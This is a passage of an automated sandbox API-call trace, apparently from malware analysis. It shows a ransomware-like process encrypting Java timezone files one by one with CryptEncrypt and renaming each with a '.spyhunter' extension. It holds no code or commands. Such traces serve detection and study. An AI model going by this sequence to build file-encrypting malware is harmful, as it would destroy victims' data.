lpNewFilePointer=0xffffffff) returned 1 [0125.764] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf74c*=0x4d, lpOverlapped=0x0) returned 1 [0125.764] GetProcessHeap () returned 0x2c0000 [0125.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.764] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.764] WriteFile (in: hFile=0x170, lpBuffer=0x25cf78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x25cf78c*, lpNumberOfBytesWritten=0x25cf74c*=0x4, lpOverlapped=0x0) returned 1 [0125.764] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf74c*=0x30, lpOverlapped=0x0) returned 1 [0125.764] CloseHandle (hObject=0x170) returned 1 [0125.764] GetProcessHeap () returned 0x2c0000 [0125.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.764] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun.spyhunter") returned 69 [0125.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun.spyhunter")) returned 1 [0125.765] GetProcessHeap () returned 0x2c0000 [0125.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.765] GetProcessHeap () returned 0x2c0000 [0125.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.765] GetProcessHeap () returned 0x2c0000 [0125.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60cc0 | out: hHeap=0x2c0000) returned 1 [0125.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf790 | out: pbBuffer=0x25cf790) returned 1 [0125.765] GetProcessHeap () returned 0x2c0000 [0125.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.766] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf788*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf788*=0x30) returned 1 [0125.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala") returned 57 [0125.767] StrStrW (lpFirst="Douala", lpSrch=".txt") returned 0x0 [0125.767] GetProcessHeap () returned 0x2c0000 [0125.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.767] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf74c*=0x41, lpOverlapped=0x0) returned 1 [0125.767] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.768] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf74c*=0x41, lpOverlapped=0x0) returned 1 [0125.768] GetProcessHeap () returned 0x2c0000 [0125.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.768] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.768] WriteFile (in: hFile=0x170, lpBuffer=0x25cf78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x25cf78c*, lpNumberOfBytesWritten=0x25cf74c*=0x4, lpOverlapped=0x0) returned 1 [0125.768] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf74c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf74c*=0x30, lpOverlapped=0x0) returned 1 [0125.768] CloseHandle (hObject=0x170) returned 1 [0125.768] GetProcessHeap () returned 0x2c0000 [0125.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.768] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala.spyhunter") returned 67 [0125.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala.spyhunter")) returned 1 [0125.772] GetProcessHeap () returned 0x2c0000 [0125.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.772] GetProcessHeap () returned 0x2c0000 [0125.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.772] GetProcessHeap () returned 0x2c0000 [0125.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60c00 | out: hHeap=0x2c0000) returned 1 [0125.772] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf788 | out: pbBuffer=0x25cf788) returned 1 [0125.772] GetProcessHeap () returned 0x2c0000 [0125.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.773] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf780*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf780*=0x30) returned 1 [0125.773] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.774] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti") returned 59 [0125.774] StrStrW (lpFirst="Djibouti", lpSrch=".txt") returned 0x0 [0125.774] GetProcessHeap () returned 0x2c0000 [0125.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.774] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf744*=0x41, lpOverlapped=0x0) returned 1 [0125.774] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.774] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf744*=0x41, lpOverlapped=0x0) returned 1 [0125.775] GetProcessHeap () returned 0x2c0000 [0125.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.775] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.775] WriteFile (in: hFile=0x170, lpBuffer=0x25cf784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x25cf784*, lpNumberOfBytesWritten=0x25cf744*=0x4, lpOverlapped=0x0) returned 1 [0125.775] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf744*=0x30, lpOverlapped=0x0) returned 1 [0125.775] CloseHandle (hObject=0x170) returned 1 [0125.775] GetProcessHeap () returned 0x2c0000 [0125.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.775] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti.spyhunter") returned 69 [0125.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti.spyhunter")) returned 1 [0125.776] GetProcessHeap () returned 0x2c0000 [0125.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.776] GetProcessHeap () returned 0x2c0000 [0125.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.776] GetProcessHeap () returned 0x2c0000 [0125.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60b40 | out: hHeap=0x2c0000) returned 1 [0125.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf788 | out: pbBuffer=0x25cf788) returned 1 [0125.776] GetProcessHeap () returned 0x2c0000 [0125.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf780*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf780*=0x30) returned 1 [0125.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.777] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam") returned 64 [0125.777] StrStrW (lpFirst="Dar_es_Salaam", lpSrch=".txt") returned 0x0 [0125.777] GetProcessHeap () returned 0x2c0000 [0125.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.777] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf744*=0x55, lpOverlapped=0x0) returned 1 [0125.777] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.778] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf744*=0x55, lpOverlapped=0x0) returned 1 [0125.778] GetProcessHeap () returned 0x2c0000 [0125.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.778] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.778] WriteFile (in: hFile=0x170, lpBuffer=0x25cf784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x25cf784*, lpNumberOfBytesWritten=0x25cf744*=0x4, lpOverlapped=0x0) returned 1 [0125.778] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf744, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf744*=0x30, lpOverlapped=0x0) returned 1 [0125.778] CloseHandle (hObject=0x170) returned 1 [0125.778] GetProcessHeap () returned 0x2c0000 [0125.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.778] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam.spyhunter") returned 74 [0125.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam.spyhunter")) returned 1 [0125.839] GetProcessHeap () returned 0x2c0000 [0125.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.839] GetProcessHeap () returned 0x2c0000 [0125.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.839] GetProcessHeap () returned 0x2c0000 [0125.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03408 | out: hHeap=0x2c0000) returned 1 [0125.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf780 | out: pbBuffer=0x25cf780) returned 1 [0125.840] GetProcessHeap () returned 0x2c0000 [0125.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf778*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf778*=0x30) returned 1 [0125.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.841] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar") returned 56 [0125.841] StrStrW (lpFirst="Dakar", lpSrch=".txt") returned 0x0 [0125.841] GetProcessHeap () returned 0x2c0000 [0125.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.841] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf73c*=0x4d, lpOverlapped=0x0) returned 1 [0125.842] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.842] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf73c*=0x4d, lpOverlapped=0x0) returned 1 [0125.843] GetProcessHeap () returned 0x2c0000 [0125.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.843] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.843] WriteFile (in: hFile=0x170, lpBuffer=0x25cf77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x25cf77c*, lpNumberOfBytesWritten=0x25cf73c*=0x4, lpOverlapped=0x0) returned 1 [0125.843] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf73c*=0x30, lpOverlapped=0x0) returned 1 [0125.843] CloseHandle (hObject=0x170) returned 1 [0125.843] GetProcessHeap () returned 0x2c0000 [0125.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.843] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar.spyhunter") returned 66 [0125.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar.spyhunter")) returned 1 [0125.847] GetProcessHeap () returned 0x2c0000 [0125.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.847] GetProcessHeap () returned 0x2c0000 [0125.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.847] GetProcessHeap () returned 0x2c0000 [0125.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60a80 | out: hHeap=0x2c0000) returned 1 [0125.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf780 | out: pbBuffer=0x25cf780) returned 1 [0125.847] GetProcessHeap () returned 0x2c0000 [0125.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf778*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf778*=0x30) returned 1 [0125.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.848] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry") returned 58 [0125.848] StrStrW (lpFirst="Conakry", lpSrch=".txt") returned 0x0 [0125.848] GetProcessHeap () returned 0x2c0000 [0125.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.848] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf73c*=0x55, lpOverlapped=0x0) returned 1 [0125.849] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.849] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf73c*=0x55, lpOverlapped=0x0) returned 1 [0125.850] GetProcessHeap () returned 0x2c0000 [0125.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.850] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.850] WriteFile (in: hFile=0x170, lpBuffer=0x25cf77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x25cf77c*, lpNumberOfBytesWritten=0x25cf73c*=0x4, lpOverlapped=0x0) returned 1 [0125.850] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf73c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf73c*=0x30, lpOverlapped=0x0) returned 1 [0125.850] CloseHandle (hObject=0x170) returned 1 [0125.850] GetProcessHeap () returned 0x2c0000 [0125.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.850] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry.spyhunter") returned 68 [0125.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry.spyhunter")) returned 1 [0125.851] GetProcessHeap () returned 0x2c0000 [0125.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.851] GetProcessHeap () returned 0x2c0000 [0125.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.851] GetProcessHeap () returned 0x2c0000 [0125.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e609c0 | out: hHeap=0x2c0000) returned 1 [0125.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf778 | out: pbBuffer=0x25cf778) returned 1 [0125.851] GetProcessHeap () returned 0x2c0000 [0125.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf770*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf770*=0x30) returned 1 [0125.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.852] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta") returned 56 [0125.852] StrStrW (lpFirst="Ceuta", lpSrch=".txt") returned 0x0 [0125.852] GetProcessHeap () returned 0x2c0000 [0125.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.852] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf734*=0x458, lpOverlapped=0x0) returned 1 [0125.927] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffba8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.928] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf734*=0x458, lpOverlapped=0x0) returned 1 [0125.928] GetProcessHeap () returned 0x2c0000 [0125.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.928] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.928] WriteFile (in: hFile=0x170, lpBuffer=0x25cf774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x25cf774*, lpNumberOfBytesWritten=0x25cf734*=0x4, lpOverlapped=0x0) returned 1 [0125.928] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf734*=0x30, lpOverlapped=0x0) returned 1 [0125.928] CloseHandle (hObject=0x170) returned 1 [0125.928] GetProcessHeap () returned 0x2c0000 [0125.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.928] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta.spyhunter") returned 66 [0125.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta.spyhunter" (normalized: "c:\\program files 